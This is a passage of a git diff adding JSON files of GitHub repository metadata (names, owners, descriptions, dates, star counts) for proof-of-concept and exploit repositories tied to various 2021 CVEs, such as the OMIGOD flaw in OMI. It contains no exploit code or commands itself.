"maldiohead\/TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "owner": { + "login": "maldiohead", + "id": 23315692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23315692?v=4", + "html_url": "https:\/\/github.com\/maldiohead", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldiohead\/TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "description": null, + "fork": false, + "created_at": "2021-11-05T02:58:15Z", + "updated_at": "2023-04-19T12:03:28Z", + "pushed_at": "2021-11-05T03:18:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 424814670, + "name": "TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "full_name": "Peterpan0927\/TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "owner": { + "login": "Peterpan0927", + "id": 26504662, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26504662?v=4", + "html_url": "https:\/\/github.com\/Peterpan0927", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Peterpan0927\/TFC-Chrome-v8-bug-CVE-2021-38001-poc", + "description": null, + "fork": false, + "created_at": "2021-11-05T03:18:46Z", + "updated_at": "2024-08-12T20:17:49Z", + "pushed_at": "2021-11-05T03:17:58Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38003.json b/2021/CVE-2021-38003.json new file mode 100644 index 0000000000..3f60dee3d0 --- /dev/null +++ b/2021/CVE-2021-38003.json @@ -0,0 +1,33 @@ +[ + { + "id": 586157765, + "name": "Chrome-V8-RCE-CVE-2021-38003", + "full_name": "SpiralBL0CK\/Chrome-V8-RCE-CVE-2021-38003", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/Chrome-V8-RCE-CVE-2021-38003", + "description": "CVE-2021-38003 exploits extracted from https:\/\/twitter.com\/WhichbufferArda\/status\/1609604183535284224", + "fork": false, + "created_at": "2023-01-07T06:09:14Z", + "updated_at": "2024-10-21T17:35:11Z", + "pushed_at": "2023-01-07T19:41:36Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 33, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38149.json b/2021/CVE-2021-38149.json new file mode 100644 index 0000000000..d46b1dff54 --- /dev/null +++ b/2021/CVE-2021-38149.json @@ -0,0 +1,33 @@ +[ + { + "id": 393319863, + "name": "CVE-2021-38149", + "full_name": "jboogie15\/CVE-2021-38149", + "owner": { + "login": "jboogie15", + "id": 67240643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67240643?v=4", + "html_url": "https:\/\/github.com\/jboogie15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jboogie15\/CVE-2021-38149", + "description": "Chikitsa Patient Management System Stored Cross-Site Scripting (XSS)", + "fork": false, + "created_at": "2021-08-06T09:01:40Z", + "updated_at": "2021-08-10T19:54:20Z", + "pushed_at": "2021-08-06T09:39:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38163.json b/2021/CVE-2021-38163.json new file mode 100644 index 0000000000..7dab592722 --- /dev/null +++ b/2021/CVE-2021-38163.json @@ -0,0 +1,33 @@ +[ + { + "id": 534881743, + "name": "CVE-2021-38163", + "full_name": "core1impact\/CVE-2021-38163", + "owner": { + "login": "core1impact", + "id": 80303847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80303847?v=4", + "html_url": "https:\/\/github.com\/core1impact", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/core1impact\/CVE-2021-38163", + "description": "CVE-2021-38163 - exploit for SAP Netveawer", + "fork": false, + "created_at": "2022-09-10T03:41:52Z", + "updated_at": "2023-05-22T10:56:10Z", + "pushed_at": "2022-09-10T04:42:38Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38185.json b/2021/CVE-2021-38185.json new file mode 100644 index 0000000000..7138964a2c --- /dev/null +++ b/2021/CVE-2021-38185.json @@ -0,0 +1,39 @@ +[ + { + "id": 387582414, + "name": "cpiopwn", + "full_name": "fangqyi\/cpiopwn", + "owner": { + "login": "fangqyi", + "id": 59844836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59844836?v=4", + "html_url": "https:\/\/github.com\/fangqyi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fangqyi\/cpiopwn", + "description": "ACE poc exploit for glibc cpio 2.13 through mmap chunk metadata curruption (CVE-2021-38185)", + "fork": false, + "created_at": "2021-07-19T20:10:13Z", + "updated_at": "2021-11-23T21:24:06Z", + "pushed_at": "2021-08-11T08:59:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cpio", + "cve", + "exploit", + "linux", + "poc" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38295.json b/2021/CVE-2021-38295.json new file mode 100644 index 0000000000..a8d8b573fe --- /dev/null +++ b/2021/CVE-2021-38295.json @@ -0,0 +1,33 @@ +[ + { + "id": 417190090, + "name": "CVE-2021-38295-PoC", + "full_name": "ProfessionallyEvil\/CVE-2021-38295-PoC", + "owner": { + "login": "ProfessionallyEvil", + "id": 21111852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21111852?v=4", + "html_url": "https:\/\/github.com\/ProfessionallyEvil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProfessionallyEvil\/CVE-2021-38295-PoC", + "description": "A simple Python proof of concept for CVE-2021-38295.", + "fork": false, + "created_at": "2021-10-14T15:45:21Z", + "updated_at": "2022-02-20T09:16:52Z", + "pushed_at": "2021-10-14T15:49:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38297.json b/2021/CVE-2021-38297.json new file mode 100644 index 0000000000..394fe79e47 --- /dev/null +++ b/2021/CVE-2021-38297.json @@ -0,0 +1,64 @@ +[ + { + "id": 719281537, + "name": "CVE-2021-38297", + "full_name": "gkrishnan724\/CVE-2021-38297", + "owner": { + "login": "gkrishnan724", + "id": 21004514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21004514?v=4", + "html_url": "https:\/\/github.com\/gkrishnan724", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gkrishnan724\/CVE-2021-38297", + "description": "A Proof of concept scenario for exploitation of CVE2021-38297 GO WASM buffer-overflow", + "fork": false, + "created_at": "2023-11-15T20:52:36Z", + "updated_at": "2024-10-08T11:25:29Z", + "pushed_at": "2023-12-05T21:38:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 781757126, + "name": "CVE-2021-38297-Go-wasm-Replication", + "full_name": "paras98\/CVE-2021-38297-Go-wasm-Replication", + "owner": { + "login": "paras98", + "id": 32601927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32601927?v=4", + "html_url": "https:\/\/github.com\/paras98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paras98\/CVE-2021-38297-Go-wasm-Replication", + "description": null, + "fork": false, + "created_at": "2024-04-04T01:17:05Z", + "updated_at": "2024-04-04T01:33:04Z", + "pushed_at": "2024-04-04T01:49:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3831.json b/2021/CVE-2021-3831.json new file mode 100644 index 0000000000..ecf6a36d8e --- /dev/null +++ b/2021/CVE-2021-3831.json @@ -0,0 +1,33 @@ +[ + { + "id": 831347071, + "name": "CVE-2021-3831", + "full_name": "aratane\/CVE-2021-3831", + "owner": { + "login": "aratane", + "id": 76691705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76691705?v=4", + "html_url": "https:\/\/github.com\/aratane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aratane\/CVE-2021-3831", + "description": "Unauthenticated Sensitive Information Disclosure", + "fork": false, + "created_at": "2024-07-20T09:36:51Z", + "updated_at": "2024-10-24T18:28:16Z", + "pushed_at": "2024-10-24T18:28:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38314.json b/2021/CVE-2021-38314.json new file mode 100644 index 0000000000..ec53479f30 --- /dev/null +++ b/2021/CVE-2021-38314.json @@ -0,0 +1,227 @@ +[ + { + "id": 434961092, + "name": "CVE-2021-38314", + "full_name": "orangmuda\/CVE-2021-38314", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-38314", + "description": " Unauthenticated Sensitive Information Disclosure (CVE-2021–38314).", + "fork": false, + "created_at": "2021-12-04T17:08:05Z", + "updated_at": "2022-08-17T17:49:09Z", + "pushed_at": "2021-12-04T17:09:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-38314", + "exploit", + "wordpress" + ], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 435936211, + "name": "cve-2021-38314", + "full_name": "phrantom\/cve-2021-38314", + "owner": { + "login": "phrantom", + "id": 52974841, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52974841?v=4", + "html_url": "https:\/\/github.com\/phrantom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phrantom\/cve-2021-38314", + "description": null, + "fork": false, + "created_at": "2021-12-07T15:39:04Z", + "updated_at": "2022-12-15T21:57:12Z", + "pushed_at": "2021-12-07T16:21:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 439038372, + "name": "CVE-2021-38314", + "full_name": "shubhayu-64\/CVE-2021-38314", + "owner": { + "login": "shubhayu-64", + "id": 68614625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68614625?v=4", + "html_url": "https:\/\/github.com\/shubhayu-64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubhayu-64\/CVE-2021-38314", + "description": null, + "fork": false, + "created_at": "2021-12-16T15:27:59Z", + "updated_at": "2022-10-14T16:45:57Z", + "pushed_at": "2021-12-16T15:31:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492366456, + "name": "cve-2021-38314", + "full_name": "twseptian\/cve-2021-38314", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2021-38314", + "description": "cve-2021-38314 - Unauthenticated Sensitive Information Disclosure", + "fork": false, + "created_at": "2022-05-15T02:10:01Z", + "updated_at": "2023-12-21T16:34:55Z", + "pushed_at": "2022-05-15T12:38:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-38314", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 507639325, + "name": "CVE-2021-38314", + "full_name": "c0ff33b34n\/CVE-2021-38314", + "owner": { + "login": "c0ff33b34n", + "id": 86168298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86168298?v=4", + "html_url": "https:\/\/github.com\/c0ff33b34n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0ff33b34n\/CVE-2021-38314", + "description": "Python exploit for CVE-2021-38314", + "fork": false, + "created_at": "2022-06-26T17:23:40Z", + "updated_at": "2022-07-15T05:19:18Z", + "pushed_at": "2022-08-12T17:25:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 534133828, + "name": "CVE-2021-38314", + "full_name": "akhilkoradiya\/CVE-2021-38314", + "owner": { + "login": "akhilkoradiya", + "id": 102510716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102510716?v=4", + "html_url": "https:\/\/github.com\/akhilkoradiya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akhilkoradiya\/CVE-2021-38314", + "description": "CVE-2021-38314 Python Exploit", + "fork": false, + "created_at": "2022-09-08T09:08:48Z", + "updated_at": "2024-07-31T05:17:06Z", + "pushed_at": "2022-09-08T09:49:15Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633954680, + "name": "CVE-2021-38314", + "full_name": "0xGabe\/CVE-2021-38314", + "owner": { + "login": "0xGabe", + "id": 68028935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xGabe\/CVE-2021-38314", + "description": "Exploit in python3 to explore CVE-2021-38314 in Redux Framework a wordpress plugin ", + "fork": false, + "created_at": "2023-04-28T17:03:27Z", + "updated_at": "2023-05-02T19:43:05Z", + "pushed_at": "2023-04-28T17:08:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38540.json b/2021/CVE-2021-38540.json new file mode 100644 index 0000000000..e85684ebd7 --- /dev/null +++ b/2021/CVE-2021-38540.json @@ -0,0 +1,33 @@ +[ + { + "id": 502931948, + "name": "PoC-for-CVE-2021-38540-", + "full_name": "Captain-v-hook\/PoC-for-CVE-2021-38540-", + "owner": { + "login": "Captain-v-hook", + "id": 99005260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99005260?v=4", + "html_url": "https:\/\/github.com\/Captain-v-hook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Captain-v-hook\/PoC-for-CVE-2021-38540-", + "description": "Missing Authentication on Critical component CVE-2021-38540", + "fork": false, + "created_at": "2022-06-13T11:43:26Z", + "updated_at": "2023-07-18T09:23:20Z", + "pushed_at": "2022-06-13T11:53:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38560.json b/2021/CVE-2021-38560.json new file mode 100644 index 0000000000..e03fccf940 --- /dev/null +++ b/2021/CVE-2021-38560.json @@ -0,0 +1,33 @@ +[ + { + "id": 453927241, + "name": "iVANTI-CVE-2021-38560", + "full_name": "os909\/iVANTI-CVE-2021-38560", + "owner": { + "login": "os909", + "id": 98735939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98735939?v=4", + "html_url": "https:\/\/github.com\/os909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/os909\/iVANTI-CVE-2021-38560", + "description": null, + "fork": false, + "created_at": "2022-01-31T08:21:05Z", + "updated_at": "2023-04-28T13:33:24Z", + "pushed_at": "2022-02-01T09:47:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38583.json b/2021/CVE-2021-38583.json new file mode 100644 index 0000000000..ad0f133937 --- /dev/null +++ b/2021/CVE-2021-38583.json @@ -0,0 +1,33 @@ +[ + { + "id": 395107205, + "name": "CVE-2021-38583", + "full_name": "charlesbickel\/CVE-2021-38583", + "owner": { + "login": "charlesbickel", + "id": 6393058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6393058?v=4", + "html_url": "https:\/\/github.com\/charlesbickel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesbickel\/CVE-2021-38583", + "description": null, + "fork": false, + "created_at": "2021-08-11T20:19:39Z", + "updated_at": "2022-03-09T21:38:04Z", + "pushed_at": "2021-08-12T12:54:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38602.json b/2021/CVE-2021-38602.json new file mode 100644 index 0000000000..e221a82ca0 --- /dev/null +++ b/2021/CVE-2021-38602.json @@ -0,0 +1,33 @@ +[ + { + "id": 395187896, + "name": "CVE-2021-38602", + "full_name": "KielVaughn\/CVE-2021-38602", + "owner": { + "login": "KielVaughn", + "id": 88814157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88814157?v=4", + "html_url": "https:\/\/github.com\/KielVaughn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KielVaughn\/CVE-2021-38602", + "description": null, + "fork": false, + "created_at": "2021-08-12T03:55:27Z", + "updated_at": "2021-08-13T14:05:35Z", + "pushed_at": "2021-08-12T20:58:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38603.json b/2021/CVE-2021-38603.json new file mode 100644 index 0000000000..c1a98d673a --- /dev/null +++ b/2021/CVE-2021-38603.json @@ -0,0 +1,33 @@ +[ + { + "id": 395444418, + "name": "CVE-2021-38603", + "full_name": "KielVaughn\/CVE-2021-38603", + "owner": { + "login": "KielVaughn", + "id": 88814157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88814157?v=4", + "html_url": "https:\/\/github.com\/KielVaughn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KielVaughn\/CVE-2021-38603", + "description": null, + "fork": false, + "created_at": "2021-08-12T21:08:54Z", + "updated_at": "2021-08-13T14:05:37Z", + "pushed_at": "2021-08-12T21:09:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38619.json b/2021/CVE-2021-38619.json new file mode 100644 index 0000000000..eec1939bfd --- /dev/null +++ b/2021/CVE-2021-38619.json @@ -0,0 +1,33 @@ +[ + { + "id": 395501049, + "name": "CVE-2021-38619", + "full_name": "charlesbickel\/CVE-2021-38619", + "owner": { + "login": "charlesbickel", + "id": 6393058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6393058?v=4", + "html_url": "https:\/\/github.com\/charlesbickel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesbickel\/CVE-2021-38619", + "description": null, + "fork": false, + "created_at": "2021-08-13T02:42:25Z", + "updated_at": "2022-03-09T21:38:05Z", + "pushed_at": "2021-08-13T13:40:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38639.json b/2021/CVE-2021-38639.json new file mode 100644 index 0000000000..f22683d8fb --- /dev/null +++ b/2021/CVE-2021-38639.json @@ -0,0 +1,33 @@ +[ + { + "id": 407374212, + "name": "CVE-2021-38639", + "full_name": "DarkSprings\/CVE-2021-38639", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-38639", + "description": "Windows win32k ascension UAC poc", + "fork": false, + "created_at": "2021-09-17T02:09:37Z", + "updated_at": "2021-09-17T02:38:42Z", + "pushed_at": "2021-09-17T02:38:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3864.json b/2021/CVE-2021-3864.json new file mode 100644 index 0000000000..710be555ac --- /dev/null +++ b/2021/CVE-2021-3864.json @@ -0,0 +1,33 @@ +[ + { + "id": 476460097, + "name": "cve-2021-3864", + "full_name": "walac\/cve-2021-3864", + "owner": { + "login": "walac", + "id": 611309, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/611309?v=4", + "html_url": "https:\/\/github.com\/walac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/walac\/cve-2021-3864", + "description": "Test for cve-2021-3864", + "fork": false, + "created_at": "2022-03-31T20:03:04Z", + "updated_at": "2022-08-15T15:42:17Z", + "pushed_at": "2022-04-01T20:40:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-38647.json b/2021/CVE-2021-38647.json new file mode 100644 index 0000000000..c8c1ac8307 --- /dev/null +++ b/2021/CVE-2021-38647.json @@ -0,0 +1,379 @@ +[ + { + "id": 406617770, + "name": "CVE-2021-38647", + "full_name": "corelight\/CVE-2021-38647", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-38647", + "description": "CVE-2021-38647 AKA \"OMIGOD\" vulnerability in Windows OMI ", + "fork": false, + "created_at": "2021-09-15T04:51:02Z", + "updated_at": "2024-08-12T20:16:27Z", + "pushed_at": "2022-02-11T01:34:56Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 406932707, + "name": "CVE-2021-38647", + "full_name": "midoxnet\/CVE-2021-38647", + "owner": { + "login": "midoxnet", + "id": 27289397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27289397?v=4", + "html_url": "https:\/\/github.com\/midoxnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/midoxnet\/CVE-2021-38647", + "description": "CVE-2021-38647 POC for RCE", + "fork": false, + "created_at": "2021-09-15T21:44:30Z", + "updated_at": "2023-05-22T14:10:47Z", + "pushed_at": "2021-09-15T21:48:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 406986611, + "name": "CVE-2021-38647", + "full_name": "horizon3ai\/CVE-2021-38647", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-38647", + "description": "Proof on Concept Exploit for CVE-2021-38647 (OMIGOD)", + "fork": false, + "created_at": "2021-09-16T02:11:36Z", + "updated_at": "2024-11-22T22:56:15Z", + "pushed_at": "2021-09-16T10:39:04Z", + "stargazers_count": 233, + "watchers_count": 233, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 233, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 407086358, + "name": "cve-2021-38647", + "full_name": "Immersive-Labs-Sec\/cve-2021-38647", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/cve-2021-38647", + "description": "A PoC exploit for CVE-2021-38647 RCE in OMI", + "fork": false, + "created_at": "2021-09-16T08:33:02Z", + "updated_at": "2023-05-05T16:11:59Z", + "pushed_at": "2021-09-16T14:50:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 407219653, + "name": "omigood", + "full_name": "marcosimioni\/omigood", + "owner": { + "login": "marcosimioni", + "id": 22682005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22682005?v=4", + "html_url": "https:\/\/github.com\/marcosimioni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/marcosimioni\/omigood", + "description": "OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the \"OMIGOD\" vulnerabilities discovered by Wiz's threat research team, specifically CVE-2021-38647.", + "fork": false, + "created_at": "2021-09-16T15:34:03Z", + "updated_at": "2024-08-12T20:16:29Z", + "pushed_at": "2021-09-22T12:46:31Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-38647", + "omigod", + "omigood", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 18, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 407896703, + "name": "omigod-lab", + "full_name": "craig-m-unsw\/omigod-lab", + "owner": { + "login": "craig-m-unsw", + "id": 54346946, + 